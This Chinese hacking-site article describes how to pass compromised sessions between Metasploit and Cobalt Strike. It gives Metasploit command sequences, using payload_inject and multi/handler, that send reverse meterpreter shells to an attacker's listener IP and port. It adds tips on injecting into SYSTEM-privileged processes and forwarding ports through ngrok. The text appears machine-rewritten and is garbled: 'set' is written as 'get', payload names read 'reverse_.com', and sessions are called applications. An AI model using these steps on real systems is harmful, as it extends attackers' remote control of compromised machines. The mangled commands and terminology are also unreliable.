Msf与CS互传sessions会话

Msf与CS互传sessions会话

入侵渗透hacker2019-07-18 23:15:4920390A+A-

Msf派生1个shell发送给cs:

最先,msf得到1个meterpreter应用程序。

留意:meterpreter应用程序必须system管理权限,才可引入到别的系统进程。

用background把应用程序挂上去后台管理,采用别的exploit用以传送应用程序。

派生1个新的shell给cs,那么msf里边采用的exploit:

exploit/windows/local/payload_inject

实际操作:

use exploit/windows/local/payload_inject(采用exploit)

get payload windows/x64/meterpreter/reverse_.com(采用的payload必须要跟cs下监视的payload方法相同)

get DisablePayloadHandler true(严禁造成1个新的handler)

get LHOST iP(ip为cs监视应用程序用的ip)

get LPORT 端口号(端口号为cs相匹配的接纳反跳shell的端口号)

get pid 系统进程号(设定派生给cs后木马病毒系统进程的pid系统进程号,假如有system管理权限则可以特定1个具备system管理权限的系统进程,那样cs接受到应用程序都是最大权限)

get session 1(设定必须配送的meterpreter)

exploit(刚开始实行)

实行以后只能获得1个cs的应用程序。

cS下的应用程序发送给MSF:

最先在msf上监视自身的ip跟端口号:

use exploit/multi/handler

get payload windows/meterpreter/reverse_.com(跟cs上采用的payload相同)

get lhost 该机ip

get lport 接纳的端口号

exploit 实行

随后cs那里建立1个foreign监视的listeners。

Listeners的ip为msf的ip,端口号为msf监视的端口号(注:假如msf是内线下实体的,则必须把端口映射到内网ip,或是应用ngrok等专用工具做总流量发送)

随后,返回cs上,选定拿到的电子计算机应用程序,鼠标右键选定spawn,随后在弹出窗口的框中

挑选不久建立的listeners监听器,随后实行。

这时,msf下只能见到早已取得了1个新的应用程序。

留意:早期运用的payload荷载必须要跟总体目标系统软件的系统软件十位数相同,不然后边传送应用程序的那时候会出現难题。


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2019 黑资讯
滇ICP备19002590号-1
安全联盟站长平台
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理